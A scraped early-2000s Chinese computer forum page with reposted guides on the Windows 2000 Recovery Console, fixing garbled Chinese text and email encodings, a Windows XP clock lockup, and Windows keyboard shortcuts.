按C键启动Windows 2000的故障恢复控制台（如果在显示出内容之前，出现几秒钟的黑屏，
不要紧张！）。
故障恢复控制台是以文本模式运行的，而且屏幕上显示一个带有编号的操作系统目录列表。
通常情况下只有一个（ C : \ W I N N T），除非你配置了两个不同的Windows 2000版本进行双重引导。
具体步骤如下：
1) 输入你想登录并进行修复的Windows 2000的编号，然后按回车键。
2) 自动登录A d m i n i s t r a t o r，输入A d m i n i s t r a t o r的密码，并按回车键。
3) 进入命令提示符为% S y s t e m R o o t %的目录下，通常是C : \ W I N N T。
现在你可以输入故障恢控制台命令，执行修复任务了。
警告因为你登录的是故障恢复控制台，所以如果安全帐户管理器（SAM）崩溃或丢失了，
则不能使用这个特性。
5.5.2 故障恢复控制台命令
在故障恢复控制台中可使用如下命令：
CD/CHDIR
CHKDSK
CLS
COPY
DEL/DELETE
DIR
DISABLE
ENABLE
DISKPART
FIXBOOT
FIXMBR
FORMAT
LISTSVC
LOGON
MAP
MD/MKDIR
MORE
RD
REN/RENAME
RMDIR
SYSTEMROOT
TYPE
ATTRIB
EXTRACT
这里的大多数命令是常用的M S - D O S命令，有一些你可能不熟悉（输入H e l p / c o m m a n d可了
解有关命令的信息）。使用这些命令可能比较危险，所以计算机新手不要使用故障恢复控制台。
键入E X I T可离开故障恢复控制台，并重新启动计算机。
5.5.3 故障恢复控制台的限制
当你在故障恢复控制台中工作时受到以下限制的制约：
. 你只能访问和查看在开始的屏幕上选择安装Windows 2000的% S y s t e m R o o t %目录（和子目
录）（通常是C : \ W I N N T）。如果你试图查看另一个% S y s t e m R o o t %目录，会看到一个“拒
绝访问”的错误。
. 可以将文件从软盘复制到硬盘。
. 可以在硬盘上将文件从一个位置复制到另一个位置。
. 不能将本地硬盘上的文件复制到软盘上。
5.5.4 安装故障恢复控制台
你可以安装故障恢复控制台，这样当你想加强配置设置和驱动程序（或需要时执行修复）
时，就可以随时使用它了。
安装是用Wi n n t 3 2命令实现的，它在Windows 2000 CD-ROM的\ i 3 8 6文件夹中。输入下面的
命令安装故障恢复控制台。
在这里：X是Windows 2000 CD-ROM的驱动器盘符或Windows 2000安装文件所在的网络共
享的映射驱动器符。f o l d e r n a m e是\ a l p h a或\ i 3 8 6。
安装程序对话框显示了一个将故障恢复控制台作为一个启动选项安装的确认，单击“是”
继续，一个安装向导会负责必要文件的自动安装。你必须重新启动计算机来完成安装。
当操作系统引导时，一个新的选项“ Microsoft Windows 2000命令控制台”出现在菜单中，
它在b o o t . i n i中的项目是：
C : \ C M D C O N S \ B O O T S E C T . D A T = ”Microsoft Windows 2000 命令控制台” / c m d c o n s
5.5.5 卸载故障恢复控制台
你可以按照下面的步骤删除故障恢复控制台和它的菜单项：
1) 编辑b o o t . i n i，删除故障恢复控制台所在的行。
2) 在引导分区的根目录中删除C : \ C m d c o n s目录。
3) 在引导分区的根目录中删除名为Cm l d r的文件。
如果有多个用户要访问一台计算机，而且只要他们中有一个用户属于管理员所担心的“知
道的东西多得足以造成危险”的那类人，那么卸载故障恢复控制台是很有意义的。

Blueidea Web Team.
Moderator Of Computer Technology Forum
mao

现任版主
积分：1571
发帖：656
来自：北京
注册：2000-07-23
 发表于 2002-02-06 23:50:03 按此观看mao的个人资料 按此发邮件给mao 访问mao的主页 mao 的 oicq 是20801171,查看 20801171 的资料 发送悄悄话给mao 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mao的IP
大家有必要看看这篇文章，可以让我们这些天天用计算机的人了解一下系统是怎么的一个启动过程，这样大家在以后遇到这样的问题时可以试着这样修复一下。我觉得是非常有用的

解决问题才有进步
解决问题才有进步
上一贴 | 下一贴
快速回复 | 主题：深入了解Win2000 引导与启动 （转）
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


平定汉字乱码（转）

计算机技术
平定汉字乱码（转）

上一贴 | 下一贴
发表人 主题: 平定汉字乱码（转）
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-01-30 08:49:20 按此观看啸的个人资料 按此发邮件给啸 收藏该主题供以后查看 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
引自： http://go4.163.com/rayboy/sofeware/wincoad.htm

引用:

我们在使用电脑时，经常会遇到乱码：例如登上港台网站时会看到乱码，打开E-mail时也会看到乱码，更为严重的是原先显示正常的Win9X/Win2K桌面、菜单中汉字一夜之间“面目全非”，本来显示正常的各种应用程序（包括游戏）中汉字也成了乱码！乱码给我们带来了太多的烦恼，告别乱码是我们共同的愿望！
一、汉字乱码现象的分类
汉字乱码现象大致可分成四类：网页、文本、文档和文件乱码。第一类是由于港台的繁体中文大五码（BIG5）与大陆简体中文（GB2312）不通用造成的；第二类是Win9X/Win2K系统（菜单、桌面、提示框）显示乱码，这是Win9X/Win2K注册表中有关字体的部分设置不当引起的；第三类是各种应用程序（包括游戏）本来显示中文的地方出现乱码，形成原因比较复杂，有第二类的乱码原因，也可能是软件用到的中文动态链接库被英文动态链接库覆盖造成的；最后一类是邮件乱码。
二、消除汉字乱码
针对以上几种乱码现象，我们来分类介绍消除乱码的方法。

（一）、网页、文本和文档文件乱码的消除
网页乱码是浏览器（如IE等）对HTML网页解释时形成的。如果在网页的代码中有形如：〈HTML〉〈HEAD〉〈META CONTENT=“text/html；charset=ISO-8859-1”〉〈/HEAD〉……〈/HTML〉的语句，浏览器在显示此页时，就会出现乱码。因为浏览器会将此页语种辨认为“欧洲语系”。解决的办法是将语种“ISO-8859-1”改为GB2312，如果是繁体网页则改为BIG5。
另一种解决办法是不修改网页代码，事先为浏览器安装多语言支持包（例如在安装IE时要安装多语言支持包），这样在浏览网页出现乱码时，就可以在浏览器中选择菜单栏下的“查看”/“编码”/“自动选择”/简体中文（GB2312），如为繁体中文则选择“查看”/“编码”/“自动选择”/繁体中文（BIG5），其它语言依此类推选择相应的语系，这样可消除网页乱码现象。
还有一种解决办法是利用多内码显示平台来转换内码。常用多内码显示平台有：
“南极星”：可自动识别GB码、BIG5码，用简体或繁体显示，并能做到同屏显示GB码和BIG5码，对日文、韩文亦能正确显示。下载地址：http:// www.njstar.com
“四通利方”：支持了包括GB、BIG5、HZ、日韩编码、UNICOD等17种汉字内码，也开始支持预览功能，并且增加了诸如“增删空格”、“插入禁排空格”等小而有用的功能，实在是网友的好帮手。下载地址：http:// www.srsnet.com
“MagicWin 98”：可真正的同屏显示不同内码，即GB码和BIG5码两者共存、都能正常显示。它支持GB、HZ、BIG5、JIS、EUC、SJIS、KSC、UTF7和UTF8等格式；支持Netscape Communicator 4.X、Internet Explorer 和Office 等软件；支持在多个窗口中同时查看不同内码的文档的超级多内码显示平台。下载地址：http:// www.itwin.com.my/magicwin
网页无乱码保存的方法是：用浏览器打开网页时，在“查看”/“编码”中选择“自动选择”，存盘时保存类型选“web页”，编码选择“UNICOD”，这样保存过的网页再次打开时，在浏览器菜单“查看”、“编码”中不管选择简体中文（GB2312）、简体中文（HZ）还是UNICODE（UTF-8）或繁体中文（BIG5），最终显示都不会出现乱码。
文本、文档文件乱码，一般是繁体中文显示在简体中文系统下或者相反情况造成的。只要把原本是繁体的内码转换为简体内码（或者相反），就可消除乱码。
Word2000能胜任这类工作，例如要把繁体中文转换为简体中文，方法是：选择要转换内码的文件，在弹出的对话框中（如图1），选择“其它编码”中的“繁体中文（BIG5）”一项，打开此文件时就不会出现乱码。无乱码保存方法：在保存时选择“文件”中的“另存为”，先存为“Word文档，存盘后打开再存为纯文本等其它格式；您也可以用Word2000的“中文简繁转换”工具实现无乱码保存，方法是在菜单栏中选择“工具/语言/中文简繁转换”，内码转换后再保存。
WPS2000也能转换内码，支持GB2312、BIG5、GBK等三种主要的汉字编码，并可在输出RTF、TXT、HTM格式文件时对内码进行转换。
除此之外，消除这类乱码还可用内码转换工具，对BIG5（繁体中文）和GB2312（国标码、简体中文）进行相互转换来实现。常用的内码转换工具有：
“飓风简繁通”：中文自由软件，纯“绿色软件”，不用安装，把300多K的压缩包解开到硬盘的任意一个目录即可使用。软件支持普通文本、剪贴板上内容、磁盘文件的BIG5→GB或GB→BIG5内码转换，速度很快。该软件特有“网站转换”功能：可在几分钟之内全自动的为您的网站生成一个BIG5码的版本。当然，您什么时候从港台地区抓个网站下来，也可以先来个BIG5→GB的转换，然后轻轻松松慢慢欣赏。下载地址：http://renliang.yeah.net
“内码转换大师”：能够以灵活的方式选取大批文件，同时进行转换。选取的文件在转换前后随时可以直接查看其内容。转换是直接在原文件上进行的，省去了选择目标目录、多次拷贝等繁琐的操作。独家具备：对于HTML文件，能够自动转换其汉字字符集定义，使之在浏览器中浏览时自动按照转换后的代码集中显示。目前支持GB2312以及BIG5两种代码集。下载地址：http://rchan.yeah.net
“华语通”：免费软件，支持BIG5<->GB双向转换，支持文本、Web页、RTF等格式，可批量转换。下载地址：http://lanny.yeah.net
“TEXT ROBOT”：支持BIG5<->GB、BIG5→GBK、BIG5→GBK简体、GBK繁体→GBK简体等多内码转换，可将文本格式转换为Web页，能进行批量内码转换。下载地址：http://denvor.yeah.net
“两岸通汉字内码转换器”：免费软件，支持GB<->BIG5、BIG5<->GB的双向转换，可以批量转换，还可直接转换剪贴板内的文本。在转换文件之前，允许你先通过预览窗口实现预览转换结果。下载地址：http:// www.njstar.com

（二）、Win9X/Win2K系统乱码的消除
这类乱码是由于注册表中关于字体部分配置不正常造成的，即使您用内码翻译软件如四通利方、南极星、Magic Win98、两岸通等处理也不会消除。解决办法是：恢复注册表中关于字体部分设置。
如有一台Win9X/Win2K版本相同且显示正常的机器，则可依下列步骤进行恢复：
1.在正常机器上选择“开始”/“运行”，在对话框中键入“REGEDIT”，打开注册表编辑器；
2.光标定位到“HKEY_LOCAL_MACHINE\ SYSTEM\CURRENT CONTROL SET\CONTROL\ FONTASSOC”，选择“注册表/导出注册表文件”，再选择“分支”，导出该分支注册表信息到文件（如LI.REG）中（如图2）；
3.把LI.REG文件Copy到显示乱码的机器上，在显示乱码机器上运行REGEDIT，选择“注册注册表”/“导入注册注册表”，把LI.REG文件导入注册表中。
如没有Win9X/Win2K版本相同且显示正常的机器，则需要您手工恢复字体部分注册表项，按以下步骤：
1.在乱码机器上打开REGEDIT（REGEDIT.EXE在WINDOWS目录下）；
2.找到“HKEY_LOCAL_MACHINE\SYSTEM\ CURRENT CONTROL SET\CONTROL\FONTASSOC”，正常情况下，会有ASSOCIATED DEFAULTFONTS、ASSOCIATED CHARSET两个文件夹，其正确的内容为：
子目录内容
中文Win98
中文Win98（OEM版）
中文Win2K
AASOCIATED CHARSET
ANSI（00）=“yes”
GB2312（86）=“yes”
DEN（FF）=“yes”
SYMBOL（02）=“no”
ANSI（00）=“yes”
GB2312（86）=“yes”
OEM（FF）=“yes”
SYMBOL（02）=“no”
ANSI（00）=“yes”
OEM（FF）=“yes”
SYMBOL（02）=“no”
ASSOCIATED DEFAULT
FONTS
AssocSystemFont=“simsun.ttf”
FontPackageDecorative=“宋体”
FontPackageDontcare=“宋体”
FontPackageModern=“宋体”
FontPackageRoman=“宋体”
FontPackageScript=“宋体”
FontPackageSwiss=“宋体”
同左栏
AssocSystemFont=“simsun.ttf”
FontPackage=“新宋体”
FontPackageDecorative=“新宋体”
FontPackageDontcare=“新宋体”
FontPackageModern=“新宋体”
FontPackageRoman=“新宋体”
FontPackageScript=“新宋体”
FontPackageSwiss=“新宋体”
3.当出现汉字乱码时，上述两个文件夹中内容就会不完整，有的没有ASSOCIATED CHARSET文件夹或其中内容残缺不全；有的ASSOCIATED DEFAULTFONTS下内容残缺。只要用REGEDIT在“HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\ CONTROL\FONTASSOC”下，根据以上正确内容恢复即可。

（三）、应用程序（包括游戏）乱码的消除
中文软件菜单等显示界面上出现乱码，可能是由于Windows注册表中关于字体设置的信息不正确地改变而造成的，这时候可以用上述第2点介绍的办法去解决。
如果用上法解决不了，那就是因为软件的中文链接库被英文链接库覆盖而引起的，这种现象经常发生在用微软开发工具例如VB、VC开发的中文软件上，这类软件中，菜单等显示界面上的汉字都是受一个动态链接库（DLL文件）控制，而软件的这个动态链接库一般安装在Windows的System目录下，如果以后安装了某个英文软件也使用同名的动态链接库，则英文软件的动态链接库就会覆盖WINDOWS\SYSTEM下的中文软件的动态链接库，这样，运行中文软件时就会调用英文的动态链接库，因此出现乱码。解决办法是重新安装中文软件，恢复中文动态链接库即可。

（四）、邮件乱码的消除
1.邮件乱码原因及其排除
邮件乱码的形成原因很多，主要有以下几个方面：
（1）邮件服务器不支持8位（非ASCII码格式）
传输邮件传输机制或邮件编码的不同，可能造成邮件服务器不支持8位（非ASCII码格式）传输而形成邮件乱码。例如直接发送中文或二进制等非ASCII码格式的邮件（如中文双字节文件、图片文件.jpg、可执行文件.exe或压缩文件.zip等二进制文件）时，邮件服务器有可能无法处理，便把信件中每个字符的第8位都过滤掉，从而造成邮件信息的失真或损坏，在收到邮件时就是一堆乱码。
对策：在发送8位格式的文本文件时，必须事先进行编码，将文件转换为7位ASCII码或更少位数的格式，然后才能保证文件的正确传送。收件人收到7位或更少位格式的邮件后，可以再转换为8位的格式，这样就可避免乱码。
（2）收发端使用的E-mail软件和设置不同
一般E-mail软件的“附件”功能都可以自动对信件先进行编码，然后送出。这样只要收信人使用的E-mail软件（如Outlook、Netscape E-mail等）能区别信件的编码方式，就可以自动将信件解码。然而由于收发件人所用的E-mail软件默认配置不同或收发件人自己定制的一些选项不同，所以在收到编码的信件后，系统不一定能识别出信件所用的编码方法，自然无法自动解码，这样就会出现乱码。
对策：可以用Winzip+IE来解码，方法是：把乱码邮件的内容，拷贝到剪贴板中，然后将其粘贴到记事本中，存为文本文件（例如LI.txt），再将其后缀改为.uue（改为LI.uue），点击此文件，会启动Winzip，然后启动IE，把Winzip中的001.txt文件拖到IE窗口中，就会显示邮件原来的内容，而不会看到乱码。
也可以根据邮件中的关键字符判断编码方法，选取合适的解码软件进行解码。
邮件的编码方式主要有：UUENCODE、Base64 encode、QP－encode、BINHEX等。
UUENCODE：这是UNIX环境下使用的编码方式，目前已经很少用，大体格式为：
begin 644 kk.zip M1G)O;2!I;&EN＋F)B3T!C(VEE＋FYC='4N961U＋G1W(%=E9"!.;W8@(#8@,3(ZM,SDZ,C4@,3DY－@I296－E:79E9#H@9G)O;2!F;&%B;6%I;"YF;&%B＋F9U:FET……
end
特征：乱码前面含有“begin xxx”，后面是编码前的原始文件名（如kk.zip），接着是已经过编码的信件内容（如上述的乱码部分）最后一行为“end”。
解码办法：可用BECKY！EUDORA等E-mail软件，选择编码中相应的选项就可解码，也可以在E-mail软件中保存乱码邮件，存为后缀为“.UUE”格式的文件，然后用Winzip解码展开。解码后就会消除乱码。
MIME/BASE64 encode：该编码方式将3个字节（8位）用4个字节（6位）表示，由于编码后的内容是6位的，因此可避免第8位被截掉，大体格式为：
MIME－Version：1.0
Content－Type：text/plain; charset="us－ascii"
Content－Transfer－Encoding:base64
Status：R
SGmhQbF6pm6hSafapmK69Lj0pFexb6q＋sXqsT6Skp OWrSKXzsN3DRLFNrmGhQQ0Kq1＋sTqq6vdCx<BR>0LF6tFit07Ddw0ShRw0KD QqtuqX9p2m2RLF6p9qoz6XOIE 1Py3Jvc29mdCuiBJbnRlcm5ldCBN……
特征：乱码前一般有如下几部分“信头”：Content－Type(内容类型)、charset(字符集)和Content－Transfer－Encoding(内容传输乱码方式)。
解码办法：用E-mail软件，选择编码中Base64 选项就可解码，解码后会消除乱码。
QpencodeQP：全称“Quoted－Printable Content－Transfer－Encoding”。因为这种格式邮件的内容都是ASCII字符集中可以打印的字符，所以名称中含有Printable。大体格式为：
=A1A=B1z=A6n=A1I=A7=DA=A6b=BA=F4=B8=F4=A4W
=B1o......
=E5==ABH=A5=F3=B0=DD=C3D=B1M=Aea=A1A......
特征：内容通常有很多等号“=”，因此不需要看“信头”也可以判断是否为QP编码。
解码办法：把邮件中类似A1A=B1z=A6n...的部分编码全部复制下来，贴到一个新的纯文本文件中，然后在文件头部加入Quoted-Pintable格式的文件头：
Contenet-Type:text/plain;Charset="GB2312"
Content-Transfer-Encoding;Quoted-Pintable
然后以“EML”为后缀保存文件，用资源管理器双击打开文件即可显示正确的内容。如果还有部分汉字乱码，可以用Winzip对存盘后的EML文件进行解压，即可看到正确的内容。
BINHEX：这种编码方式大体格式为：
(This file must be converted with Binhex4.0)
SGmhQbF6pm6hSafapmK69Lj0pFexb6qssTqq6vdCx<BR> 0LF6tFit07Ddw0ShRw0KDQqtuqX9p2m2RLF6p9q
oz6XOIE……
解码办法：用E-mail软件对它解码；也可在E-mail软件中保存乱码邮件，存为后缀为“.HQX”格式的文件，然后用Winzip解码展开。
解码后会消除乱码。
UTIF-7/UTIF-8：它们是UNICODE的两种转换码。
UTIF-7编码方式大体格式为：
+SGmhQbF/6pm6hSafapmK69L/j0pFexb6q＋sXqsT6Skp. OWrSKXzsN3DRLFNrmGhQQ0Kq1－sTqq6vdCx<BR>0LF6tFit07Ddw0ShRw0KD QqtuqX9p2m2RLF6p9qoz6XOIE 1Py3Jvc29mdCuiBJbnRlcm5ldCBN……
解码办法：在原E-mail头加入以下信息：
MIME－Version：1.0
Content－Type：text/plain; charset="utf-7"
Content－Transfer－Encoding:7bit
插入后与字符留一空行，将邮件存为“EML”后缀，然后用Outlook即可解码，消除乱码。
UTIF-8
解码办法：在原E-mail头加入以下信息：
MIME－Version：1.0
Content－Type：text/plain; charset="utf-8"
Content－Transfer－Encoding:8bit
将邮件存为“EML”后缀，然后用Outlook即可解码，消除乱码。
（3）操作系统语种不同
对于中文电子邮件，如果收信方所用的操作系统是英文环境而且没有外挂中文系统或未切换为中文（如四通利方或南极星等）编码方式，也会无法看到中文只见乱码。所有的双字节字符（如中文简/繁体的GB和BIG5码及日文的JIS、EUC和朝鲜文的 KSC码等）在非本语种操作系统下都会出现乱码。同样在中文简体的GB码环境下看其它双字节字符时也只能看到乱码。
对策：安装多语言支持包或使用多内码显示平台（如四通利方或南极星等），对收到的邮件，根据其使用的语种切换到相应的编码方式即可消除乱码。
2.为了避免别人收到乱码，发信方应注意：
（1） E-mail软件中的正确设置
使用英文E-mail软件应设置成：
文字设定Default CHARSET：ISO 8859-1
（Latin1）
编码方式Encoding：Quoted-Printable，不可选择7位（因为7位不支持中文）
字码页Code Page（可选）：936或HZ-GB-2312，
以支持整字识别邮件格式：MIME
字体：宋体
中文E-mail软件应设置成：
文字设定Default CHARSET：简体中文GB2312
编码方式Encoding：Quoted-Printable邮件格式：MIME
字体：宋体
Outlook Express中应把“简体中文（GB2312）作为默认的邮件使用语言，选择“国际设置”/为接收的所有邮件使用默认的编码。
（2）发送前将邮件按7位格式重新编码
在发送8位格式的文本文件时，必须事先进行编码，将文件转换为7位ASCII码或更少位数的格式，然后才能保证文件的正确传送。收件人收到7位或更少位格式的邮件之后，可以再转换为8位的格式，这样就可以阅读了。
在邮件客户端软件中的书写（撰写）选项中，设定默认自动为7位编码。
（3）转换成合适的内码
在E-mail软件的书写（撰写）选项中，设定默认自动为7位编码。对用汉字系统编辑的中文邮件在发送前，最好在固定的签字栏中注明自己所使用的汉字码标准(如：GB2312、中文HZ、GBK)；港澳台及东南亚地区邮件作者在使用BIG5码撰写完邮件、向内地发送前要转换成上述三种简体国标码中的一种形式并在签字栏中注明。如不转换则可能无法阅读，因为国内用户使用的邮件系统有很多不支持BIG5码。
（4）发送重要信息时先发测试信
发送重要信息时，为了确认是否无须编码即可发送正文，应该先发送测试信。而且还应确定收件人能否对附件文件进行解码。如果发送已经编码的邮件，则最好添加足够的“信头”信息，以便收件人知道所需的解码方法。建议对UUENCODE/UUDeview编码方式用UUENCODING作信头，对Mpack编码方式用Base64 encoding作信头。
（5）尽量利用“附件”功能发送文件
几乎所有的邮件软件，如Netscape、The Bat!、 Becky! 等邮件系统附加这类非标准 ASCII码格式的文件时，附加文件通常可以自动进行“Base64”方式编码（仅对附件部分进行编码）。在用“附件”方式发送邮件之前，无需进行编码；否则适得其反。因为邮件软件能够自动成功解码这类“附加”文件，因此在发送中文类邮件时应该首选这种方法。
如果无法以附件方式发送文件，则必须在正文中发送中文或二进制文件如果发/收件人之间远隔万里，则传送过程中，第八位将可能被截掉。这时最好先在正文中用中文给收件人发一封测试信，并了解对方能否正确收到邮件正文。如果第八位被截掉，则收件人将会看到一些乱码，而不是上述的uu/b64/Qp等格式，而且这种信件几乎不可恢复。
对策：在Netscape、Eudora或Pegasus Mail等你所使用的邮件系统中，选择其首选项或选项配置中的“Quoted Printalbe”或“MIME encoding”。
（6）选择优秀的客户端邮件软件
选择优秀E-mail收发软件可有效解决邮件乱码。
3.为排除乱码，收信方应注意：
查找邮件：签字栏或正文中有无指明本邮件所使用汉字标准码类别的英文字符；在“查看(V)”下拉菜单中选中“语言”，随后出现的菜单中会包括本系统所能支持的全部汉字标准，在其中单击邮件中所指明的一种。如果收到的邮件中没有指明其所使用的汉字标准，则只可按顺序单击，直到邮件正文显示正确为止（数个汉字标准中必有一个前面有“.”标记，此即您编辑器所用的汉字标准）。若使用的是Netscape,可在Option菜单的Document Encode中选择相应的项目。
4.在非中文平台上中文邮件不出现乱码方法
当对方没有中文平台而打开您发的中文邮件时，就会出现乱码。解决办法有两种：
（1）用E-mail AID之类的工具
UCWIN GOLD 1.0附带的工具E-mail AID可把文本文件转换为AID格式文件，大小只比原TXT文件增加几K。写好中文邮件后，用文本格式存盘，然后用E-mail AID以AID格式保存，最后把此文件连同E-mail AID一起作为附件插在信中。对方收到信后，只需运行E-mail AID打开AID格式文件即可看到汉字，不管对方在何语言平台下，都不会出现乱码。
（2）把中文邮件以图形格式保存
用画笔等绘图软件书写中文邮件，在图片中输入文字，用默认的BMP格式保存，将属性置为黑白模式（以减少BMP图片体积），然后用Winzip把它压缩成ZIP格式，作为附件在邮件中发送，这样不管对方在何语言平台下，都不会出现乱码。这种方法的缺点是生成的BMP中文邮件体积太大。

作者: 李红

Blueidea Web Team.
Moderator Of Computer Technology Forum
len

SlowHorse
积分：1192
发帖：568
来自：hebei
注册：2001-09-29
 发表于 2002-01-30 09:13:27 按此观看len的个人资料 按此发邮件给len len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
我收邮件时经常遇到乱码,这篇文章很有用哟.

Dripping water wears away a stone.
天啦！

高级用户
积分：182
发帖：47
来自：南京，江苏，中国
注册：2001-12-06
 发表于 2002-01-30 11:07:41 按此观看天啦！的个人资料 按此发邮件给天啦！ 天啦！ 的 oicq 是265135,查看 265135 的资料 发送悄悄话给天啦！ 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天啦！的IP
实用！已经保存下来慢慢研究！

[img]照片[/img]
上一贴 | 下一贴
快速回复 | 主题：平定汉字乱码（转）
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


为什么只看见“欢迎使用”，却无法进入WIN XP？（答案）

计算机技术
为什么只看见“欢迎使用”，却无法进入WIN XP？（答案）

上一贴 | 下一贴
发表人 | 主题: 为什么只看见“欢迎使用”，却无法进入WIN XP？（答案）
洋葱 高级用户 积分：228 发帖：63 来自： 注册：2002-02-03 | 发表于 2002-02-04 00:23:17 按此观看洋葱的个人资料 按此发邮件给洋葱 洋葱 的 oicq 是17484890,查看 17484890 的资料 收藏该主题供以后查看 发送悄悄话给洋葱 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看洋葱的IP Windows XP是微软最新推出的视窗操作系统，其新增的系统时钟“自动与Intenet时间服务器同步”是一项颇具特色的功能。只要你的电脑连在互联网上，就可以随时点击屏幕右下角系统托盘中的时钟标志，连接到Windows XP的时间服务器（time.windows.com或time.nist.gov)校准日期和时间。有了这一功能，网虫们就再也不会迷失在时间的丛林里了。 当然。好功能也有不好的一面。如果你为了继续使用某一过期的共享软件而把时钟调到诸如1998年、1999年这样的无效日期，或者是电脑主板CMOS掉电而让时钟停留在199X年的某一时间，那么，再次启动WINDOWS XP时，系统的日期检验机制会在“欢迎使用”的界面里锁定电脑，不做任何提示，也无任何选项，除了鼠标能动外就象死机一样，无论用什么修复操作都将无效。 很多人都会以为系统安装失败而格式化分区并导致数据丢失。其实不然。如果电脑装有双操作系统或多操作系统，就不妨先启动到其他系统，将系统日期更改后，再重新启动到WINDOWS XP一切就好了。如果只装有WINDOWS XP一个系统，那除了格式化外就没有别无他法了-------所以千万别乱调你的系统时钟！ 以上文字取自《大众电脑报》2002 .1.14 作者：张力富 手打的，辛苦了，谢谢你对经典的支持 [image] --啸 [这消息被啸编辑过(编辑时间2002-02-04 00:26:25)] 我是一只菜菜鸟，不要嫌我麻烦啊~~~
leveg 初级用户 积分：8 发帖：2 来自： 注册：2002-02-23 | 发表于 2002-02-23 11:54:45 按此观看leveg的个人资料 按此发邮件给leveg 发送悄悄话给leveg 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看leveg的IP 谢谢以上提示。刚刚发现此功能。可是，为什么我在与time.windows.com同步时间的时候提示“出错”呢？我用的是东八区“北京，重庆，香港，乌鲁木齐”。
洋葱 高级用户 积分：228 发帖：63 来自： 注册：2002-02-03 | 发表于 2002-02-23 17:13:42 按此观看洋葱的个人资料 按此发邮件给洋葱 洋葱 的 oicq 是17484890,查看 17484890 的资料 发送悄悄话给洋葱 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看洋葱的IP 这个我也不清楚啊~~ 我是一只菜菜鸟，不要嫌我麻烦啊~~~
上一贴 | 下一贴
快速回复 | 主题：为什么只看见“欢迎使用”，却无法进入WIN XP？（答案）
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


Windows快捷键大全（转）

计算机技术
Windows快捷键大全（转）

上一贴 | 下一贴
发表人 主题: Windows快捷键大全（转）
len

SlowHorse
积分：1192
发帖：568
来自：hebei
注册：2001-09-29
 发表于 2001-12-12 09:23:43 按此观看len的个人资料 按此发邮件给len len 的 oicq 是3248586,查看 3248586 的资料 收藏该主题供以后查看 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
Windows快捷键大全
F1　　　　　　　　　　　显示当前程序或者windows的帮助内容。
F2　　　　　　　　　　　当你选中一个文件的话，这意味着“重命名”
F3　　　　　　　　　　　当你在桌面上的时候是打开“查找：所有文件”
                        对话框
F10或ALT　　　　　　　　激活当前程序的菜单栏
windows键或CTRL+ESC　　 打开开始菜单
CTRL+ALT+DELETE　　　　 在win9x中打开关闭程序对话框
DELETE　　　　　　　　　删除被选择的选择项目，如果是文件，将被放
                        入回收站
SHIFT+DELETE　　　　　　删除被选择的选择项目，如果是文件，将被直
                        接删除而不是放入回收站
CTRL+N　　　　　　　　　新建一个新的文件
CTRL+O　　　　　　　　　打开“打开文件”对话框
CTRL+P　　　　　　　　　打开“打印”对话框
CTRL+S　　　　　　　　　保存当前操作的文件
CTRL+X　　　　　　　　　剪切被选择的项目到剪贴板
CTRL+INSERT 或 CTRL+C　 复制被选择的项目到剪贴板
SHIFT+INSERT 或 CTRL+V　粘贴剪贴板中的内容到当前位置
ALT+BACKSPACE 或 CTRL+Z 撤销上一步的操作
ALT+SHIFT+BACKSPACE　　 重做上一步被撤销的操作
Windows键+M　　　　　　 最小化所有被打开的窗口。
Windows键+CTRL+M　　　　重新将恢复上一项操作前窗口的大小和位置
Windows键+E　　　　　　 打开资源管理器
Windows键+F　　　　　　 打开“查找：所有文件”对话框
Windows键+R　　　　　　 打开“运行”对话框
Windows键+BREAK　　　　 打开“系统属性”对话框
Windows键+CTRL+F　　　　打开“查找：计算机”对话框
SHIFT+F10或鼠标右击　　 打开当前活动项目的快捷菜单
SHIFT　　　　　　　　　 在放入CD的时候按下不放，可以跳过自动播放
                        CD。在打开word的时候按下不放，可以跳过自
                        启动的宏
ALT+F4　　　　　　　　　关闭当前应用程序
ALT+SPACEBAR　　　　　　打开程序最左上角的菜单
ALT+TAB　　　　　　　　 切换当前程序
ALT+ESC　　　　　　　　 切换当前程序
ALT+ENTER　　　　　　　 将windows下运行的MSDOS窗口在窗口和全屏幕
                        状态间切换
PRINT SCREEN　　　　　　将当前屏幕以图象方式拷贝到剪贴板
ALT+PRINT SCREEN　　　　将当前活动程序窗口以图象方式拷贝到剪贴板
CTRL+F4　　　　　　　　 关闭当前应用程序中的当前文本（如word中）
CTRL+F6　　　　　　　　 切换到当前应用程序中的下一个文本（加shift
                        可以跳到前一个窗口）

在IE中：

ALT+RIGHT ARROW　　　　 显示前一页（前进键）
ALT+LEFT ARROW　　　　　显示后一页（后退键）
CTRL+TAB　　　　　　　　在页面上的各框架中切换（加shift反向）
F5　　　　　　　　　　　刷新
CTRL+F5　　　　　　　　 强行刷新

    目的快捷键

    激活程序中的菜单栏 F10

    执行菜单上相应的命令 ALT+菜单上带下划线的字母

    关闭多文档界面程序中的当

    前窗口 CTRL+ F4

    关闭当前窗口或退出程序 ALT+ F4

    复制 CTRL+ C

    剪切 CTRL+ X

    删除 DELETE

    显示所选对话框项目的帮助 F1

